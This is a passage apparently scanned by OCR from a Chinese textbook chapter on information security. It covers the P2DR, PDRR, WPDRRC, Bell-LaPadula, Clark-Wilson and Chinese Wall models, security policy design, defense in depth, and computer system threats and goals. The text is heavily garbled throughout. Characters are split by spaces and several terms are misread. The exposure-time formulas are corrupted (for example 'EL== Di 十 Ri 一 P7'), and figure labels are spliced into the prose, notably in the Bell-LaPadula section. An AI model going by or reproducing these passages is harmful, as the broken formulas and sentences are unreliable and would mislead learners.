还 需要 及 时 响应 ,这 样 的 体系 需要 在 统一 的 、 一 致 的 安全 策略 指导 下 实施 ,形成 一 个 完备 的 、 
闭环 的 动态 自 适应 安全 体系 。 

P2DR 模型 是 建立 在 基于 时 间 的 安全 理论 基础 之 上 的 。 用 Di 表示 检测 时 间 ,是 在 攻击 
发 生 的 同时 检测 系统 发 挥 作用 ,攻击 行为 被 检测 出 来 需要 的 时 间 ;Ri 表示 响应 时 间 , 是 检测 
到 攻击 之 后 ,系统 会 做 出 应 有 的 响应 动作 所 需 时 间 ;Ei 表示 系统 暴露 时 间 , 即 系统 处 于 不 安 
全 状况 的 时 间 (EL== Di 十 Ri 一 P7) ;Pi 表示 安全 防护 时 间 , 攻 击 成 功 所 需 时 间 被 称 作 安 全 体 
系 能 够 提供 的 防护 时 间 。 要 实现 安全 ,必须 让 防护 时 间 大 于 检测 时 间 加 上 响应 时 间 ， 
即 Pt> Dtt+Ri。 

P2DR 模型 基本 上 体现 了 比较 完整 的 信息 安全 体系 的 思想 ,勾画 出 信息 安全 体系 建立 
之 后 一 个 良好 的 表现 形态 。 该 模型 一 直 被 普遍 使 用 ,不 过 , P2DR 也 有 不 够 完善 或 者 说 不 够 
明确 的 地 方 , 那 就 是 对 系统 恢复 的 环节 没有 足够 重视 。 

2. P2DR2 模型 

在 P2DR 模型 中 ,恢复 (Recovery) 环 节 是 包含 在 响应 (Response) 环 节 中 的 ,作为 事件 
响应 之 后 的 一 项 处 理 措施 。 不 过 , 随 着 人 们 对 业务 连续 性 和 灾难 恢复 越 加 重视 ,尤其 是 
“9。11” 恐 怖 事件 发 生 之 后 ,人 们 对 P2DR 模型 的 认识 也 就 有 了 新 的 内 容 , 产 生 了 如 图 1. 9 
的 PZDRR 模型 。 


检测 


图 1.8 P2DR 模型 图 图 1.9 P2DRR 模型 图 


P2DRR 模型 ,或 者 叫 PPDRR( 或 者 叫 PPDR2) ,与 P2DR 唯一 的 区 别 就 是 把 恢复 环节 
提 到 了 和 防护 ,检测 ,响应 等 环节 同等 的 高 度 。 在 PDRR 模型 中 ,信息 保障 安全 策略 .防护 、 
检测 .响应 和 恢复 共同 构成 了 完整 的 安全 体系 。 

保护 检测、 恢复 、 响 应 这 几 个 阶段 并 不 是 孤立 的 ,构建 信息 安全 保障 体系 必须 从 安全 的 
各 个 方面 进行 综合 考虑 ,只 有 将 技术 ,管理 .策略 .工程 过 程 等 方面 紧密 结合 ,安全 保障 体系 
才能 真正 成 为 指导 安全 方案 设计 和 建设 的 有 力 依据 。 

PDRR 也 是 基于 时 间 的 动态 模型 ,其 中 恢复 环节 对 于 信息 系统 和 业务 活动 的 生存 起 着 
至 关 重要 的 作用 ,组 织 只 有 建立 并 采用 完善 的 恢复 计划 和 机 制 , 其 信息 系统 才能 在 重大 灾难 
事件 中 尽快 恢复 并 延续 业务 。 
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3. 安 氏 信息 安全 生命 周期 模型 

安 氏 公司 提出 的 并 被 业界 广泛 认同 的 信息 安全 生命 周期 方法 论 , 它 建立 在 BS7799/ 
ISO 17799 之 上 。 

安 氏 安全 模型 有 7 个 核心 : 策略 (Policy)、 评 估 (Assessment) ,设计 (Design) ,执行 
(Implementation )、 管理 (Management)、 紧 急 响 应 (Emergency Response) 和 教育 
(Education) ,其 关系 图 如 图 1. 10 所 示 。 


a 
应 急 响应 


图 1.10 7 个 核心 的 信息 安全 生命 周期 模型 


4. WPDRRC 安全 体系 模型 

我 国 863 信息 安全 专家 组 博采众长 推出 WPDRRC 安全 模型 ,如 图 1. 11 所 示 。 该 模型 
全 面 涵盖 了 各 个 安全 因素 ,突出 了 人 ,策略 ,管理 的 
重要 性 ,反映 了 各 个 安全 组 件 之 间 的 内 在 联系 。 

模型 中 人 是 安全 模型 的 核心 ,政策 (包括 法 律 、 
法 规 、 制 度 、 管 理 ) 是 安全 的 桥梁 ,技术 是 落实 在 
WPDRRC 这 6 个 环节 的 各 个 方面 ,在 各 个 环节 中 
起 作用 。 

其 中 ,预警 (Warning) 是 采用 多 检测 点 数据 收 
集 和 智能 化 的 数据 分 析 方法 检测 是 否 存在 某 种 恶 i 
意 的 攻击 行为 ,并 评测 攻击 的 威胁 程度 、 攻 击 的 本 
质 、 范 围 和 起 源 ,同时 预测 敌 方 可 能 的 行动 ;保护 (Protect) 是 采用 一 系列 的 手段 (识别 、 认 
证 ,授权 \ 访 问 控制 数据 加 密 ) 保 障 数据 的 保密 性 ,完整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 等 ; 
检测 (Detect) 是 利用 高 级 技术 提供 的 工具 检查 系统 存在 的 提供 黑客 攻击 、 白 领 犯罪 病毒 泛 
滥 的 可 能 脆弱 性 , 即 系统 的 脆弱 性 检测 、 入 侵 检 测 ,病毒 检测 ;响应 (Respond) 是 对 危及 安全 
的 事件 行为 .过 程 即 时 作出 响应 处 理 , 杜 绝 危 害 的 进一步 蔓延 扩大 ,力求 系统 尚 能 提供 正常 
服务 ,包括 审计 跟踪 .事件 报警 .事件 处 理 ; 恢 复 (Restore) 是 一 旦 系统 遭 到 破坏 将 采取 的 一 
系列 措施 ,如 文件 的 备份 .数据 库 的 自动 恢复 等 ,尽快 恢复 系统 功能 ,提供 正常 服务 ;反击 
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(Counterattack) 是 利用 高 技术 工具 取得 证 据 , 作 为 犯罪 分 子 犯罪 的 线索 和 证 据 , 依 法 侦查 
处 置 犯 罪 分 子 。 

5.Bell_LaPadula 安全 模型 

Bell-LaPadula 保密 性 模型 (BLP) 如 图 1. 12 所 示 , 是 第 一 个 能 够 提供 分 级 别 数据 机 密 


性 保障 的 安全 策略 模型 (多 级 安全 )。 它 是 基于 强制 访问 
控制 系统 ,以 敏感 度 来 划分 资源 的 安全 级 别 ,数据 和 用 户 全 高 密 国 高 密 
被 划分 为 公开 (Unclassified)、 受 限 (Restricted)、 秘 密 个 一 般 对 象 
(Confidential) ,机 密 (Secret) 和 高 密 (Top Secret)5 个 安 条 条 
全 等 级 。 将 数据 划分 为 多 安全 级 别 与 敏感 度 的 系统 称 为 最 二 
多 级 安全 系统 (如 本 模型 )。BLP 模型 的 信息 系统 是 一 
个 由 低 到 高 的 层次 化 结构 。 

BLP 模型 基于 两 种 规则 来 保障 数据 的 机 密度 与 敏 Es 全 各 可 
感度 ， 一 般 对 象 人 

。 上 读 (NRU)。 主 体 不 可 读 安全 级 别 高 于 它 的 ”图 1.12 Bell_LaPadula 安全 模型 

数据 ; 


。 下 写 (NWD)。 主 体 不 可 写 安全 级 别 低 于 它 的 数据 。 

6. Clark-Wilson 安全 模型 

Clark-Wilson 模型 如 图 1. 13 所 示 , 它 定义 了 数据 项 约束 CDI 旨 在 对 数据 项 进行 完整 
性 保护 ,完整 性 检测 过 程 IVP 判断 CDI 是 否 处 在 合法 状态 ,转换 过 程 TP 通过 事务 过 程 将 
CDI 从 一 个 合法 状态 转换 到 另 一 种 合法 状态 。 


TP 转换 为 UDI 为 CDI1 IVP 检 查 所 有 的 
TP 基于 CDI1 更 新 CDI2 订单 和 账单 
(订单 ) 和 CDI3( 账 单 ) (CDI2/CDI3) 
提交 订单 提交 CDI2、CDI3 EY 
UDI 8 
用 户 
应 用 程序 服务 器 数据 库 服务 器 


图 1.13 Clark-Wilson 模型 应 用 


处 理 过 程 是 系统 接受 “自由 数据 条 目 (UDI)" 并 将 其 转换 为 “ 受 限 数据 条 目 (CDI)”, 而 
受 限 数据 条 目 仅 能 被 “转换 程序 (TP)” 所 改变 。 访 问 控制 机 制 由 主体 .TP 和 CDI 三 个 元 素 
组 成 ,转换 程序 保证 CDI 的 完整 性 ,每 个 CDI 拥有 一 个 完整 性 检查 程序 (IVP) 。 

7. China Wall 模型 

China Wall 模型 是 应 用 在 多 边 安 全 系统 中 的 安全 模型 ,应 用 在 可 能 存在 利益 冲突 的 组 
织 中 ,如 图 1. 14 所 示 。 特 点 是 用 户 必须 选择 一 个 其 可 以 访问 的 区 域 , 用 户 必须 自动 拒绝 来 
自 其 他 与 用 户 所 选区 域 的 利益 冲突 区 域 的 访问 。China Wall 安全 策略 的 基础 是 客户 访问 的 
信息 不 会 与 其 目前 可 支配 的 信息 产生 冲突 。 

这 种 模型 同时 包括 了 自主 访问 控制 (DAC) 和 强制 访问 控制 (MAC) 的 特性 。 例 如 银行 
家 可 以 选择 为 谁 工作 (DAC) ,但 是 一 旦 选 定 就 只 能 为 该 客户 工作 (MAC)。 
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图 1.14 China Wall 应 用 实例 


1.3.2 信息 安全 策略 


安全 策略 是 指 在 一 个 特定 的 环境 里 (安全 区 域 ) ,为 了 保证 提供 一 定 级 别 的 安全 保护 所 
必须 遵守 的 一 系列 条 例 和 规则 。 它 们 定义 了 一 个 组 织 要 实现 的 安全 目标 和 实现 这 些 安全 目 
标的 途径 。 安 全 策略 的 层次 分 为 安全 策略 目标 、 机 构 安 全 策略 和 系统 安全 策略 三 级 。 

信息 安全 策略 可 以 划分 为 问题 策略 (Issue Policy) 和 功能 策略 (Functional Policy) 两 个 
部 分 。 问 题 策 略 描述 了 一 个 组 织 所 关心 的 安全 领域 和 对 这 些 领 域内 安全 问题 的 基本 态度 。 
功能 策略 描述 如 何 解决 所 关心 的 问题 ,包括 制定 具体 的 硬件 和 软件 配置 规格 说 明 ,使 用 策略 
以 及 雇员 行为 策略 。 

信息 安全 策略 必须 有 清晰 和 完全 的 文档 描述 ,必须 有 相应 的 措施 保证 信息 安全 策略 得 
到 强制 执行 。 在 组 织 内 部 ,必须 有 行政 措施 保证 制定 的 信息 安全 策略 被 不 折 不 扣 地 执行 , 管 
理 层 不 能 允许 任何 违反 组 织 信息 安全 策略 的 行为 存在 ; 另 一 方面 ,也 需要 根据 业务 情况 的 变 
化 不 断 地 修改 和 补充 信息 安全 策略 。 

1. 安全 策略 的 制定 

制定 安全 策略 的 目的 是 保证 系统 安全 ,保护 工作 的 整体 性 .计划 性 及 规范 性 ,保证 各 项 
措施 和 管理 手段 的 正确 实施 ,使 系统 网 络 信息 数据 的 机 密 性 .完整 性 及 可 用 性 受到 全 面 、 可 
靠 的 保护 。 制 定安 全 策略 应 按 如 下 步骤 进行 

(1) 安全 需求 分 析 ; 

(2) 对 系统 网 络 资源 进行 评估 ; 

(3) 对 可 能 存在 的 风险 进行 分 析 ; 

(4) 确定 内 部 信息 对 外 开放 的 种 类 及 发 布 方式 和 访问 方式 ; 

(5) 明确 系统 网 络 管理 人 员 的 责任 和 义务 ; 

(6) 确定 针对 潜在 风险 采取 的 安全 保护 措施 的 主要 构成 方面 ,制定 安全 存 取 ,访问 
规则 。 

策略 制定 要 遵循 以 下 原则 : 

(1) 一 种 安全 策略 实质 上 表明 所 涉及 的 系统 在 进行 一 般 操 作 时 ,在 安全 范围 内 什么 是 
允许 的 ,什么 是 不 允许 的 。 

(2) 策略 通常 不 作 具 体 规定 , 它 只 是 提出 什么 是 最 重要 的 ,而 不 确切 地 说 明 如 何 达 到 所 
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希望 的 这 些 结果 。 

(3) 安全 策略 都 建立 在 授权 的 基础 之 上 ,一 般 按 授权 性 质 的 不 同 区 分 不 同 的 策略 。 在 
安全 策略 中 包含 对 “什么 构成 授权 ”的 说 明 。 

(4) 在 一 般 性 的 安全 策略 中 可 能 写 有 “未 经 适当 授权 的 实体 ,信息 不 得 给 予 .不 被 授权 、 
不 允许 引用 、 任 何 资源 也 不 得 为 其 使 用 ”。 

信息 系统 安全 的 防御 策略 原则 是 最 小 特权 、 纵 深 防御 .阻塞 点 ,监测 和 消除 最 薄弱 链接 、 
失效 保护 ,普遍 参与 .防御 多 样 化 和 简单 化 。 信 息 系 统 安全 的 工程 策略 原则 是 系统 性 、 相 关 
性 ,动态 性 和 相对 性 。 

2. 安全 策略 的 内 容 

不 同 于 技术 方案 ,信息 安全 策略 的 内 容 只 是 描述 一 个 组 织 保证 信息 安全 的 途径 的 原则 
性 文件 , 它 不 涉及 具体 做 什么 和 如 何 做 的 问题 ,只 需 指出 要 完成 的 目标 。 

信息 安全 策略 对 于 整个 组 织 提供 全 局 性 指导 ,为 具体 的 安全 措施 和 规定 提供 一 个 全 局 
性 框架 。 在 信息 安全 策略 中 不 规定 使 用 什么 具体 技术 ,也 不 描述 技术 配置 参数 ,描述 语言 应 
该 是 简洁 的 , 非 技 术 性 的 和 具有 指导 性 的 。 比 如 一 个 涉及 对 敏感 信息 加 密 的 信息 安全 策略 
条 目 可 以 这 样 描述 : 

条 目 1“ 任 何 类 别 为 机 密 的 信息 ,无论 存储 在 计算 机 中 ,还 是 通过 公共 网 络 传输 时 ,必须 
使 用 本 公司 信息 安全 部 门 指定 的 加 密 硬件 或 者 加 密 软件 予以 保护 。” 

这 个 叙述 没有 谈 及 加 密 算法 和 密 钥 长 度 ,所 以 当 旧 的 加 密 算 法 被 替换 ,新 的 加 密 算法 被 
公布 的 时 候 , 无 须 对 信息 安全 策略 进行 修改 。 

信息 安全 策略 可 以 被 审核 和 评价 。 信 息 安全 策略 的 制定 者 综合 风险 评估 、 信 息 对 业务 
的 重要 性 ,考虑 组 织 所 遵从 的 安全 标准 ,制定 组 织 的 信息 安全 策略 ,可 能 包括 下 面 的 内 容 : 
加 密 策略 。 描 述 组 织 对 数据 加 密 的 安全 要 求 。 
使 用 策略 。 描 述 设备 使 用 .计算 机 服务 使 用 和 雇员 安全 规定 ,以 保护 组 织 的 信息 和 
资源 安全 。 
线路 连接 策略 。 描 述 诸如 传真 发 送 和 接收 模拟 线路 与 计算 机 连接 、 拨 号 连接 等 安 
全 要 求 。 
反 病 毒 策略 。 给 出 有 效 减 少 计算 机 病毒 对 组 织 的 威胁 的 一 些 指导 方针 ,明确 在 哪些 
环节 必须 进行 病毒 检测 。 
应 用 服务 提供 策略 。 定 义 应 用 服务 提供 者 必须 遵守 的 安全 方针 。 
审计 策略 。 描 述 信息 审计 要 求 ,包括 审计 小 组 的 组 成 ,权限 .事故 调查 .安全 风险 估 
计 、 信 息 安全 策略 符合 程度 评价 ,对 用 户 和 系统 活动 进行 监控 等 活动 的 要 求 。 
电子 邮件 使 用 策略 。 描 述 内 部 和 外 部 电子 邮件 接收 、 传 递 的 安全 要 求 。 
数据 库 策略 。 描 述 存储 检索 、 更 新 等 管理 数据 库 数据 的 安全 要 求 。 
网 络 划分 策略 。 定 义 网 络 分 区 和 位 于 “ 非 军事 区 域 (Demilitarized Zone)” 的 设备 。 
第 三 方 的 连接 策略 。 定 义 第 三 方 接 入 的 安全 要 求 。 
敏感 信息 策略 。 对 于 机 密 信息 进行 分 级 ,按照 它们 的 敏感 度 描述 安全 要 求 。 
内 部 策略 。 描 述 对 组 织 内 部 的 各 种 活动 安全 要 求 ,使 组 织 的 产品 服务 和 利益 受到 充 
分 保护 。 
Internet 接 人 策略 。 定 义 在 组 织 防火 墙 之 外 的 设备 和 操作 的 安全 要 求 。 
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口令 防护 策略 。 定 义 创建 .保护 和 改变 口令 的 要 求 。 

远程 访问 策略 。 定 义 从 外 部 主机 或 者 网 络 连接 到 组 织 的 网 络 进行 外 部 访问 的 安全 
要 求 。 

。 路 由 器 安全 策略 。 定 义 组 织 内 部 路 由 器 和 交换 机 的 最 低 安 全 配置 。 

。 服务 器 安全 策略 。 定 义 组 织 内 部 服务 器 的 最 低 安全 配置 。 

VPN 安全 策略 。 定 义 通过 VPN 接 入 的 安全 要 求 。 

无 线 通信 策略 。 定 义 无 线 系统 接 入 的 安全 要 求 。 

3. 安全 策略 分 类 

按照 所 涉及 的 授权 的 性 质 一 般 可 将 策略 分 为 基于 规则 的 策略 、 基 于 身份 的 策略 和 基于 


角色 的 策略 三 种 。 


(1) 基于 身份 的 安全 策略 。 使 用 建立 在 不 多 的 一 般 属性 或 敏感 类 之 上 的 规则 ,它们 通 


常 是 强加 的 。 它 的 基础 是 用 户 的 身份 和 属性 以 及 被 访问 的 资源 或 客体 的 身份 和 属性 。 在 一 
定 程度 上 与 “必须 认识 ”的 安全 观念 相当 。 它 的 目的 是 过 滤 对 数据 或 资源 的 访问 。 


这 种 策略 在 执行 时 ,将 有 关 访 问 权 的 信息 视 为 访问 者 所 拥有 ,还 是 视 为 被 访问 数据 的 一 


部 分 。 前 者 的 例子 为 特权 标识 或 权力 ,给予 用 户 并 为 代表 该 用 户 进行 活动 的 进程 所 使 用 ,后 
者 的 例子 为 访问 控制 表 。 这 两 种 情况 下 ,数据 项 的 大 小 可 以 有 很 大 的 变化 (从 完整 的 文件 到 
数据 元 素 ), 这 些 数据 项 可 以 按 权 力 命名 ,或 带 有 它 自己 的 访问 控制 表 。 


(2) 基于 规则 的 安全 策略 。 涉 及 建立 在 特定 的 .个体 化 属性 之 上 的 授权 准则 ,假定 某 些 


属性 与 被 应 用 实体 永久 相关 联 ,其 余 属 性 可 以 是 某 种 占有 物 ( 如 权力 ) ,它们 可 传送 给 另外 的 
实体 。 它 的 基础 是 强加 于 全 体 用户 的 总 安全 策略 ,是 为 了 以 最 小 的 代价 保证 信息 系统 的 安 
全 ,使 信息 系统 发 挥 最 大 的 效益 。 授 权 通常 依赖 于 敏感 性 。 在 一 个 安全 系统 中 ,数据 或 资源 
应 该 标注 安全 标记 。 代 表 用 户 进行 活动 的 进程 可 以 得 到 与 其 原 发 者 相应 的 安全 标记 。 


(3) 基于 角色 的 安全 策略 。 按 角色 使 用 授权 机 制 , 它 为 每 个 个 体 或 用 户 分 配角 色 , 按 角 


色 分 配 许 可 权限 。 


4. 安全 策略 的 实施 
安全 策略 是 提供 安全 服务 的 一 套 准 则 。 一 项 安全 服务 可 以 由 若干 项 安全 机 制 来 实现 。 


安全 服务 (Security Service) 是 由 安全 机 构 所 提供 的 服务 , 它 确保 该 系统 或 数据 传送 具有 足 
够 的 安全 性 。 安 全 机 构 是 实现 和 执行 各 种 安全 策略 的 功能 的 集合 。 


安全 机 制 是 实施 安全 策略 的 方法 工具 或 者 章程 。 安 全 机 制 可 单独 实施 ,也 可 以 组 合 使 


用 。 如 果 对 “安全 ”和 “ 非 安 全 ”行为 的 描述 给 定安 全 策略 规范 ,安全 机 制 就 能 够 阻止 攻击 , 检 
测 攻击 ,或 者 章 到 攻击 后 恢复 工作 。 通 常 有 预防 ,检测 和 恢复 三 类 安全 机 制 。 


适应 不 同 策略 要 求 的 各 种 各 样 的 防护 措施 均 离 不 开 人 的 掌握 和 控制 ,因此 系统 的 安全 


最 终 是 由 人 来 控制 的 。 安 全 离 不 开 人 员 的 审查 ,控制 和 管理 ,要 通过 制定 、 执 行 和 实施 各 种 
管理 制度 以 及 各 种 安全 保护 条 例 来 实现 。 


5. 纵深 防御 
纵深 防御 (Defense-in-Depth) 最 初 来 源 于 军事 战略 ,有 时 也 称 作 弹性 防御 或 是 深层 防 


御 , 是 以 全 面 深入 的 防御 去 延迟 而 不 是 阻止 前 进 中 的 敌人 ,通过 放弃 空间 来 换取 时 间 而 抵御 
敌人 的 策略 。 


不 论 攻 击 或 是 防守 ,对 信息 安全 来 说 都 是 过 程 ,成 功 的 关键 在 于 对 过 程 的 把 握 。 防 御 层 
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数 越 多 ,对 系统 资源 进行 未 授权 访问 的 难度 就 越 大 。 通 过 提供 宛 余 防 御 层 来 确保 安全 性 ,在 
某 一 层 或 者 在 某 些 情况 下 多 个 层 被 攻破 时 , 宛 余 的 防御 层 能 够 对 资源 进行 保护 。 纵 深 防 御 
有 别 于 通过 一 个 单一 而 强大 的 防御 战线 去 防御 敌人 ,而 是 试图 用 下 列 方式 阻击 敌人 : 使 攻 
击 潮流 在 一 段 时 间 内 失去 动能 ;使 攻击 方 在 一 个 广大 地 区 内 失去 攻击 能 力 。 

但 是 ,安全 体系 不 应 只 依靠 单一 安全 机 制 和 多 种 安全 服务 的 堆砌 ,应 该 建立 互相 支撑 的 
多 种 安全 机 制 ,建立 具有 协议 层次 和 纵向 结构 层次 (信息 流 方向 ) 的 完备 体系 ,通过 多 层 机 制 
互相 支撑 来 获取 整个 信息 系统 的 安全 。 这 种 原则 在 日 常生 活 中 也 是 常见 的 ,例如 大 门 上 既 
安装 了 门 锁 ,又 安装 了 插销 ;汽车 要 开车 门 , 还 要 开 点 火器 才能 发 动 等 。 

纵深 防御 思想 是 近年 来 才 发 展 起 来 的 , 它 从 各 个 层面 (包括 主机 、 网 络 , 系 统 边界 和 支撑 
性 基础 设施 等 ) ,根据 信息 资产 保护 的 不 同等 级 来 保障 信息 与 信息 系统 的 安全 ,实现 预警 、 保 
护 、 检 测 、 反 应 和 恢复 这 5 个 安全 内 容 。 

纵深 防御 是 美国 国防 部 提出 的 信息 保障 策略 ,该 策略 的 基本 原理 可 应 用 于 任何 机 构 的 
信息 系统 或 网 络 之 中 。 纵 深 防御 体系 就 是 将 分 散 系统 整合 成 一 个 异 构 网 络 系统 ,使 用 基于 
联动 联防 和 网 络 集中 管理 与 监控 的 技术 ,将 所 有 信息 安全 和 数据 安全 产品 有 机 地 结合 在 一 
起 ,在 漏洞 预防 ` 攻 击 处 理 、 破 坏 修 复 三 方面 给 用 户 提供 整体 的 解决 方案 ,能 够 极 大 地 提高 系 
统 防护 效果 ,降低 网 络 管理 的 风险 和 复杂 性 。 

由 于 黑客 攻击 的 方式 具有 高 技巧 性 、 分 散 性 、 随 机 性 和 局 部 持续 性 的 特点 ,因此 即使 是 
多 层面 的 安全 防御 体系 ,如 果 是 静态 的 ,也 无 法 抵御 来 自 外 部 和 内 部 的 攻击 ,只 有 将 众多 的 
攻击 手法 进行 搜集 、 归 类 ,分 析 、 消 化 ,综合 ,将 其 体系 化 , 才 有 可 能 使 防御 系统 与 之 相 匹 配 、 
相符 合 ,以 自动 适应 攻击 的 变化 ,从 而 形成 动态 的 安全 防御 体系 。 

因此 ,与 WPDRRC 模型 一 样 ,纵深 防御 形成 了 一 种 层次 结构 ,全 面 涵盖 了 各 个 安全 因 
素 , 突 出 了 人 策略 ,管理 的 重要 性 ,与 各 安全 防护 技术 组 件 相互 依存 ,相互 配合 ,相互 支撑 ， 
相互 制约 ,相互 之 间 具 有 层次 和 互动 关系 。 


1.4 计算 机 系统 安全 


1.4.1 计算 机 系统 安全 概述 


1. 计算 机 系统 的 安全 威胁 
计算 机 系统 (Computer System) 狭 义 上 是 指 计算 机 硬件 及 其 运行 的 软件 和 信息 资源 ,是 组 
成 信息 系统 的 一 部 分 。 扩 展 定义 还 包括 计算 机 系统 的 使 用 者 ,管理 策略 ;甚至 还 包括 软件 运 
行 必须 的 网 络 技术 与 设备 。 因 此 , 简 言 之 ,计算 机 系统 是 指 信息 系统 依赖 于 计算 机 存在 的 实 
体 与 环境 系统 。 

网 络 环境 下 的 计算 机 系统 面临 如 下 安全 威胁 : 

(1) 泄露 。 把 消息 内 容 发 布 给 任何 人 或 没有 合法 密 钥 的 进程 。 

(2) 流量 分 析 。 发 现 通信 双方 之 间 信 息 流 的 结构 模式 ,可 以 用 来 确定 连接 的 频率 、 持 续 
时 间 长 度 ,还 可 以 发 现 报 文 数量 和 长 度 等 。 

(3) 伪装 。 从 一 个 假冒 信息 源 向 网 络 中 插入 消息 。 

(4) 内 容 算 改 。 消 息 内 容 或 时 间 被 插入 、 删 除 、 变 换 、 修 改 。 


(5) 顺序 修改 。 插 入 、 删 除 或 重组 消息 序列 。 

(6) 时 间 修改 。 消 息 延 迟 或 重 放 。 

(7) 否认 。 接 收 者 否认 收 到 消息 ;发送 者 否认 发 送 过 消息 。 

2. 计算 机 系统 安全 内 容 

计算 机 系统 安全 是 指 为 计算 机 系统 建立 和 采取 的 技术 与 管理 的 安全 保护 措施 ,用 以 保 
护 计算 机 系统 中 的 硬件 .软件 以 及 数据 ,防止 因 偶然 或 恶意 的 原因 而 使 系统 或 信息 遭 到 破 
坏 、 更 改 或 泄露 。 

计算 机 系统 安全 内 容 包 括 物理 安全 ,运行 安全 以 及 信息 安全 三 个 方面 。 

(1) 计算 机 系统 的 物理 安全 。 物 理 安全 是 信息 系统 安全 的 基础 ,保护 计算 机 设备 ,设施 
( 含 网 络 ) 以 及 其 他 媒体 免 遭 地 震 、 水 灾 、 火 灾 、 有 害 气体 和 其 他 环境 事故 (如 电磁 污染 等 ) 破 
坏 的 措施 和 过 程 。 特 别 是 避免 由 于 电磁 泄露 产生 信息 泄露 ,从 而 干扰 他 人 或 受 他 人 干扰 。 

物理 安全 包括 环境 安全 (机 房 与 设施 安全 、 环 境 与 人 员 安 全 、 防 其 他 自然 灾害 ) ,设备 安 
全 ( 防 资 和 防 毁 、 防 止 电磁 泄露 .防止 线路 截获 , 防 电磁 干扰 ,电源 保护 ) 和 媒体 安全 (媒体 数 
据 安全 ,媒体 本 身 安全 )3 个 方面 。 

(2) 计算 机 系统 的 运行 安全 。 保 证 系统 正常 运行 ,保障 系统 功能 的 安全 实现 ,保护 信息 
处 理 过 程 安全 的 一 套 安全 措施 。 避 免 因 为 系统 的 崩溃 和 损坏 而 对 系统 存储 、 处 理 和 传输 的 
信息 造成 破坏 和 损失 。 包 括 风险 分 析 、 审 计 跟 踪 、 备 份 与 恢复 、 应 急 响应 4 个 方面 。 

。 风险 分 析 。 指 为 了 使 计算 机 信息 系统 能 安全 地 运行 ,首先 了 解 影 响 计算 机 信息 系统 
安全 运行 的 诸多 因素 和 存在 的 风险 ,分 析 并 找 出 克服 这 些 风 险 的 方法 。 
审计 跟踪 。 利 用 审计 跟踪 工具 对 计算 机 信息 系统 的 工作 过 程 进行 详尽 的 跟踪 记录 ， 
同时 保存 好 审计 记录 和 审计 日 志 , 并 从 中 发 现 问题 和 及 时 解决 问题 ,保证 系统 安全 
可 靠 地 运行 。 

。 备份 恢复 与 应 急 响应 。 根 据 所 用 信息 系统 的 功能 特性 和 灾难 特点 制定 包括 应 急 反 

应 、 备 份 操作 ,恢复 措施 ,一 旦 灾难 事件 发 生 ,就 可 最 大 限度 地 恢复 计算 机 系统 的 正 
常 运行 。 

(3) 计算 机 系统 的 信息 安全 。 包 括 信 息 传输 的 安全 (动态 安全 ) 信息 存储 的 安全 (静态 
安全 ) 以 及 对 网 络 传输 信息 内 容 的 审计 3 个 方面 。 

信息 传输 安全 包括 数据 加 密 、 数 据 完整 性 鉴别 、 防 抵赖 等 ;信息 存储 安全 包括 数据 库 安 
全 ,终端 安全 等 ;信息 内 容 的 审计 是 指 实时 对 进出 内 部 网 络 的 信息 进行 内 容 审计 ,以 防止 或 
追查 可 能 的 泄密 行为 。 例 如 隐私 泄露 。 


1.4.2 计算 机 系统 安全 的 目标 与 技术 


1. 计算 机 系统 安全 的 目标 
从 信息 安全 的 观点 出 发 ,计算 机 系统 安全 的 目标 是 保护 系统 免 遭 偶发 的 或 有 意 的 对 信 
息 非 授权 泄露 修改、 破坏 ,或 丧失 处 理 信息 能 力 ,实质 是 保护 信息 的 安全 , 即 信息 的 机 密 性 、 
完整 性 .可 用 性 和 不 可 和 否认 性 (信息 的 基本 安全 属性 ) 。 不 同 的 层面 可 分 为 : 
。 面向 数据 的 安全 。 主 要 涉及 保护 信息 的 机 密 性 、 完 整 性 .可 用 性 和 不 可 否认 人 性。 
。 面向 使 用 者 的 安全 。 主 要 涉及 认证 ,授权 访问 控制 ,不 可 否认 和 可 服务 性 以 及 基于 
内 容 的 个 人 隐私 知识 产权 等 的 保护 。 
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。 面向 管理 者 的 安全 。 除 上 述 层面 外 ,还 包括 可 控 性 。 

计算 机 系统 安全 的 具体 目标 如 下 : 

(1) 信息 机 密 性 ,又 称 为 保密 性 。 保 证 机 密 信息 不 会 泄露 给 非 授权 的 人 或 实体 ,或 供 其 
使 用 的 特性 。 

(2) 身份 真实 性 。 能 对 通信 实体 身份 的 真实 性 进行 鉴别 。 

(3) 完整 性 。 指 通信 传输 的 数据 应 防止 被 修改 .删除 .插入 替换 或 重 发 ,以 保证 数据 的 
真实 性 。 
(4) 服务 可 用 性 。 保 证 合法 用 户 对 信息 和 资源 的 使 用 不 会 被 不 正当 地 拒绝 。 

(5) 系统 可 控 性 。 能 够 控制 使 用 资源 的 人 或 实体 的 使 用 方式 。 

(6) 可 靠 性 。 保 证 所 传输 的 信息 不 属于 无 用 信息 。 

(7) 访问 控制 。 保 证 信息 资源 不 被 非法 使 用 和 非法 访问 。 

(8) 抗 抵赖 性 ,也 称 为 不 可 和 否认 性 。 建 立 有 效 的 责任 机 制 ,防止 实体 否认 其 行为 。 

(9) 可 审查 性 。 对 出 现 的 信息 安全 问题 提供 调查 的 依据 和 手段 。 

2. 计算 机 系统 安全 的 实现 技术 

计算 机 系统 安全 的 实现 技术 有 以 下 几 种 : 

(1) 物理 安全 。 保 护 计 算 机 系统 免 受 硬件 实体 和 通信 链 路 的 破坏 和 损害 。 主 要 是 防止 
电磁 辐射 ,防止 自然 灾害 和 人 为 的 故意 破坏 ;措施 是 电磁 屏蔽 .干扰 措施 。 

(2) 安全 控制 。 保 证 网 络 资源 不 被 非法 使 用 和 非法 访问 。 分 为 介入 访问 控制 .用户 权 
限 控制 和 防火 墙 控制 。 

(3) 安全 服务 。 利 用 加 密 技术 、 认 证 技术 、 入 侵 检测 、 反 病毒 技术 等 提供 认证 ,访问 控 
制 . 机 密 性 ,完整 性 可用性、 防 否 认 等 安全 服务 。 用 于 对 付 典 型 安全 威胁 的 安全 服务 ,如 
表 1.5 所 示 。 


表 1.5 用 于 对 付 典型 安全 威胁 的 安全 服务 


安全 威胁 安全 服务 

假冒 攻击 认证 服务 

授权 侵犯 访问 控制 服务 

窃听 攻击 机 密 性 服务 

完整 性 破坏 完整 性 服务 

服务 的 否认 非 否认 服务 

拒绝 服务 认证 服务 ,访问 控制 服务 ,完整 性 服务 


(4) 加 密 技术 。 加 密 是 一 种 主动 的 防护 手段 ,分 为 对 称 加 密 和 公 钥 加 密 。 

(5) 认证 技术 。 目 前 一 般 采用 基于 密码 的 认证 技术 ,基于 人 的 生理 特征 参数 的 保密 性 
